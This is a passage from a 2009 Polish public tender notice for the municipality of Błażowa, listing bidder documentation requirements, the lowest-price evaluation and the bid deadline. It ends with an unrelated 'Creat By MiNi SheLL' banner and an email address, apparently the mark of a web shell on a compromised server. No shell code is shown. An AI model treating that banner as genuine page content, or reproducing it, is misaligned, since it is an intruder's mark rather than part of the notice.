6.3.1.4.2.	dokument potwierdzający aktualne członkostwo w Polskiej Izbie Inżynierów Budownictwa
6.3.1.4.3.	życiorys zawodowy potwierdzający co najmniej 3 letni staż w nadzorowaniu.
6.3.2.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia jeżeli  w wykazie, o którym mowa w pkt. 6.3.  Wykonawca wskaże osoby, którymi będzie dysponował
6.4.	Oświadczenie o spełnieniu warunków udziału w postępowaniu i nie podleganiu wykluczeniu z postępowania zgodnie z ustawą Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. 
(Dz. U. z 2007 r. Nr 223 poz. 1655 z późn.zm.).
6.5.	Wykaz dokumentów zastrzeżonych jako tajne jeżeli  takie stanowią część oferty. Objęte powyższym zastrzeżeniem dokumenty stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie. 
Uwaga: Stosownie do art. 8 ust. 3 ustawy Prawo Zamówień Publicznych Wykonawca może zastrzec nie później niż w terminie składania ofert, które ze złożonych informacji stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i nie mogą być udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 cytowanej ustawy.
6.6.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt. 6.1.1 SIWZ  stosownie do treści § 2 Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605) w sprawie rodzaju dokumentów, jakich może żądać  zamawiający od  Wykonawcy, oraz form w jakich te dokumenty mogą być składane i Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniające rozporządzenie w sprawie rodzaju dokumentów, jakich może żądać  zamawiający od  Wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 188, poz. 1155) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające  odpowiednio, że:  nie otwarto likwidacji ani nie ogłoszono upadłości. Dokument  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert. 
6.6.1.	 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przez notariuszem, właściwym organem sądowym, administracyjnym albo właściwym organem samorządu zawodowego lub gospodarczego  odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania. 
Dokumenty wymagane dla potwierdzenia spełniania przez Wykonawców warunków udziału w postępowaniu są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz tłumaczeniem na język polski poświadczonym przez Wykonawcę.
7.1.	Wypełniony formularz ofertowy (załącznik nr 1 do SIWZ).
7.2.	Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu i niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego zgodnie z ustawą z dnia 29 stycznia 2004 (Dz.U. z 2007 Nr 223, poz. 1655 z późn. zm.) (załącznik nr 3 do SIWZ).
7.3.	Dokumenty potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu określone w Rozdziale 6 SIWZ
7.4.	Pełnomocnictwo jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym oraz w przypadku podmiotów występujących wspólnie.
7.5.	Dokument potwierdzający wniesienie wadium;
7.6.	Wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom. Brak oświadczenia w sprawie powierzenia wykonania części zamówienia podwykonawcom wraz ze wskazaniem zakresu usług, uznany będzie za zobowiązanie do samodzielnego wykonania zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.blazowa.itl.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 36-030 Błażowa Plac Jana Pawła II 1 pokój nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 10:00, miejsce: 36-030 Błażowa Plac Jana Pawła II 1 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com